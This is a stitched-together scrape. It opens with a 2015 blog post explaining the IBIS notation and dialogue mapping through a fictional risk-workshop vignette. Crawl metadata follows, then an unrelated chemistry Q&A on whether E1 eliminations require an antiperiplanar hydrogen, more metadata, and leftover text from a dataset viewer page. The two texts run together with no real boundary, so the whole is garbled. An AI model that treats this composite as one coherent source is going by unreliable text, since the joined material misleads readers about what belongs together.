Last week, my friend Paul Culmsee conducted an internal workshop in my organisation on the theme of collaborative problem solving. Dialogue mapping is one of the tools he introduced during the workshop. This piece, primarily intended as a follow-up for attendees, is an introduction to dialogue mapping via a vignette that illustrates its practice (see this post for another one). I’m publishing it here as I thought it might be useful for those who wish to understand what the technique is about.
Dialogue mapping uses a notation called Issue Based Information System (IBIS), which I have discussed at length in this post. For completeness, I’ll begin with a short introduction to the notation and then move on to the vignette.
### A crash course in IBIS
The IBIS notation consists of the following three elements:
1. Issues(or questions): these are issues that are being debated. Typically, issues are framed as questions on the lines of “What should we do about X?” where X is the issue that is of interest to a group. For example, in the case of a group of executives, X might be rapidly changing market condition whereas in the case of a group of IT people, X could be an ageing system that is hard to replace.
2. Ideas(or positions): these are responses to questions. For example, one of the ideas of offered by the IT group above might be to replace the said system with a newer one. Typically the whole set of ideas that respond to an issue in a discussion represents the spectrum of participant perspectives on the issue.
3. Arguments: these can be Pros (arguments for) or Cons (arguments against) an issue. The complete set of arguments that respond to an idea represents the multiplicity of viewpoints on it.
Compendium is a freeware tool that can be used to create IBIS maps– it can be downloaded here.
In Compendium, IBIS elements are represented as nodes as shown in Figure 1: issues are represented by blue-green question markspositions by yellow light bulbspros by green + signs and cons by red – signs. Compendium supports a few other node types, but these are not part of the core IBIS notation. Nodes can be linked only in ways specified by the IBIS grammar as I discuss next.
Figure 1: IBIS node types
The IBIS grammar can be summarized in three simple rules:
1. Issues can be raised anew or can arise from other issues, positions or arguments. In other words, any IBIS element can be questioned. In Compendium notation: a question node can connect to any other IBIS node.
2. Ideas can only respond to questions– i.e. in Compendium “light bulb” nodes can only link to question nodes. The arrow pointing from the idea to the question depicts the “responds to” relationship.
3. Arguments can only be associated with ideas– i.e. in Compendium “+” and “–“ nodes can only link to “light bulb” nodes (with arrows pointing to the latter)
The legal links are summarized in Figure 2 below.
Figure 2: Legal links in IBIS
…and that’s pretty much all there is to it.
The interesting (and powerful) aspect of IBIS is that the essence of any debate or discussion can be captured using these three elements. Let me try to convince you of this claim via a vignette from a discussion on risk.
### The Risk – a Dialogue Mapping vignette
“Morning all,” said Rick, “I know you’re all busy people so I’d like to thank you for taking the time to attend this risk identification session for Project X. The objective is to list the risks that we might encounter on the project and see if we can identify possible mitigation strategies.”
He then asked if there were any questions. The head waggles around the room indicated there were none.
“Good. So here’s what we’ll do,” he continued. “I’d like you all to work in pairs and spend 10 minutes thinking of all possible risks and then another 5 minutes prioritising. Work with the person on your left. You can use the flipcharts in the breakout area at the back if you wish to.”
Twenty minutes later, most people were done and back in their seats.
“OK, it looks as though most people are done…Ah, Joe, Mike have you guys finished?” The two were still working on their flip-chart at the back.
“Yeah, be there in a sec,” replied Mike, as he tore off the flip-chart page.
“Alright,” continued Rick, after everyone had settled in. “What I’m going to do now is ask you all to list your top three risks. I’d also like you tell me why they are significant and your mitigation strategies for them.” He paused for a second and asked, “Everyone OK with that?”
Everyone nodded, except Helen who asked, “isn’t it important that we document the discussion?”
“I’m glad you brought that up. I’ll make notes as we go along, and I’ll do it in a way that everyone can see what I’m writing. I’d like you all to correct me if you feel I haven’t understood what you’re saying. It is important that my notes capture your issues, ideas and arguments accurately.”
Rick turned on the data projector, fired up Compendium and started a new map. “Our aim today is to identify the most significant risks on the project – this is our root question” he said, as he created a question node. “OK, so who would like to start?”
Figure 3: The root question
“Sure,” we’ll start, said Joe easily. “Our top risk is that the schedule is too tight. We’ll hit the deadline only if everything goes well, and everyone knows that they never do.”
“OK,” said Rick, “as he entered Joe and Mike’s risk as an idea connecting to the root question. “You’ve also mentioned a point that supports your contention that this is a significant risk – there is absolutely no buffer.” Rick typed this in as a pro connecting to the risk. He then looked up at Joe and asked, “have I understood you correctly?”
“Yes,” confirmed Joe.
Figure 4: Map in progress
“That’s pretty cool,” said Helen from the other end of the table, “I like the notation, it makes reasoning explicit. Oh, and I have another point in support of Joe and Mike’s risk – the deadline was imposed by management before the project was planned.”
Rick began to enter the point…
“Oooh, I’m not sure we should put that down,” interjected Rob from compliance. “I mean, there’s not much we can do about that can we?”
…Rick finished the point as Rob was speaking.
Figure 5: Two pros for the idea
“I hear you Rob, but I think it is important we capture everything that is said,” said Helen.
“I disagree,” said Rob. “It will only annoy management.”
“Slow down guys,” said Rick, “I’m going to capture Rob’s objection as “this is a management imposed-constraint rather than risk. Are you OK with that, Rob?”
Rob nodded his assent.
Fig 6: A con enters the picture
I think it is important we articulate what we really think, even if we can’t do anything about it,” continued Rick. There’s no point going through this exercise if we don’t say what we really think. I want to stress this point, so I’m going to add honesty and openness as ground rules for the discussion. Since ground rules apply to the entire discussion, they connect directly to the primary issue being discussed.”
Figure 7: A “criterion” that applies to the analysis of all risks
“OK, so any other points that anyone would like to add to the ones made so far?” Queried Rick as he finished typing.
He looked up. Most of the people seated round the table shook their heads indicating that there weren’t.
“We haven’t spoken about mitigation strategies. Any ideas?” Asked Rick, as he created a question node marked “Mitigation?” connecting to the risk.
Figure 8: Mitigating the risk
“Yeah well, we came up with one,” said Mike. “we think the only way to reduce the time pressure is to cut scope.”
“OK,” said Rick, entering the point as an idea connecting to the “Mitigation?” question. “Did you think about how you are going to do this? He entered the question “How?” connecting to Mike’s point.
Figure 9: Mitigating the risk
“That’s the problem,” said Joe, “I don’t know how we can convince management to cut scope.”
“Hmmm…I have an idea,” said Helen slowly…
“We’re all ears,” said Rick.
“…Well…you see a large chunk of time has been allocated for building real-time interfaces to assorted systems – HR, ERP etc. I don’t think these need to be real-time – they could be done monthly…and if that’s the case, we could schedule a simple job or even do them manually for the first few months. We can push those interfaces to phase 2 of the project, well into next year.”
There was a silence in the room as everyone pondered this point.
“You know, I think that might actually work, and would give us an extra month…may be even six weeks for the more important upstream stuff,” said Mike. “Great idea, Helen!”
“Can I summarise this point as – identify interfaces that can be delayed to phase 2?” asked Rick, as he began to type it in as a mitigation strategy. “…and if you and Mike are OK with it, I’m going to combine it with the ‘Cut Scope’ idea to save space.”
“Yep, that’s fine,” said Helen. Mike nodded OK.
Rick deleted the “How?” node connecting to the “Cut scope” idea, and edited the latter to capture Helen’s point.
Figure 10: Mitigating the risk
“That’s great in theory, but who is going to talk to the affected departments? They will not be happy.” asserted Rob. One could always count on compliance to throw in a reality check.
“Good point,” said Rick as he typed that in as a con, “and I’ll take the responsibility of speaking to the department heads about this,” he continued entering the idea into the map and marking it as an action point for himself. “Is there anything else that Joe, Mike…or anyone else would like to add here,” he added, as he finished.
Figure 11: Completed discussion of first risk (click to view larger image)
“Nope,” said Mike, “I’m good with that.”
“Yeah me too,” said Helen.
“I don’t have anything else to say about this point,” said Rob, “ but it would be great if you could give us a tutorial on this technique. I think it could be useful to summarise the rationale behind our compliance regulations. Folks have been complaining that they don’t understand the reasoning behind some of our rules and regulations. ”
“I’d be interested in that too,” said Helen, “I could use it to clarify user requirements.”
“I’d be happy to do a session on the IBIS notation and dialogue mapping next week. I’ll check your availability and send an invite out… but for now, let’s focus on the task at hand.”
The discussion continued…but the fly on the wall was no longer there to record it.
### Afterword
I hope this little vignette illustrates how IBIS and dialogue mapping can aid collaborative decision-making / problem solving by making diverse viewpoints explicit. That said, this is a story, and the problem with stories is that things go the way the author wants them to. In real life, conversations can go off on unexpected tangents, making them really hard to map. So, although it is important to gain expertise in using the software, it is far more important to practice mapping live conversations. The latter is an art that requires considerable practice. I recommend reading Paul Culmsee’s series on the practice of dialogue mapping or <advertisement> Chapter 14 of The Heretic’s Guide to Best Practices</advertisement> for more on this point.
That said, there are many other ways in which IBIS can be used, that do not require as much skill. Some of these include: mapping the central points in written arguments (what’s sometimes called issue mapping) and even decisions on personal matters.
To sum up: IBIS is a powerful means to clarify options and lay them out in an easy-to-follow visual format. Often this is all that is required to catalyse a group decision.
Written by K
June 10, 2015 at 9:14 am | 2019-10-23 13:37:06 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 85, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5480087995529175, "perplexity": 1246.586578496836}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570987833766.94/warc/CC-MAIN-20191023122219-20191023145719-00159.warc.gz"} |
https://chemistry.stackexchange.com/questions/20478/does-the-hydrogen-taken-in-an-e1-reaction-have-to-be-antiperiplanar/20482 | # Does the hydrogen taken in an E1 reaction have to be antiperiplanar?
I'm wondering if the hydrogen stolen during an $E_1$ reaction has to be antiperiplanar/anticoplanar like the hydrogen in an $E_2$ reaction.
Intuitively I'd say no, because the carbocation is flat so there's less steric hindrance than an E2 reaction, but I want to check.
As an example, we could use 3-methyl-2-bromobutane. Once that carbocation forms and shifts, does it matter which hydrogen is stolen?
It actually does not matter whether or not it is antiperiplanar, because once the carbocation is formed, there is no sense of antiperiplanar. The two carbon atoms are in the same plane now. For a planar carbocation, all arrangements are equivalent(i.e. no sense of stereoisomerism). It does not matter which side the base attacks on. Also, since the bond angle in an $sp^2$ system is greater than that of an $sp^3$ system, the steric resistance to the base is less, which is the point you mentioned.
• Yes, you're right. I should not have written $\alpha-\beta$ Dec 9, 2014 at 9:01 | 2022-09-27 07:13:42 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6194603443145752, "perplexity": 953.1027792073648}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00675.warc.gz"} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.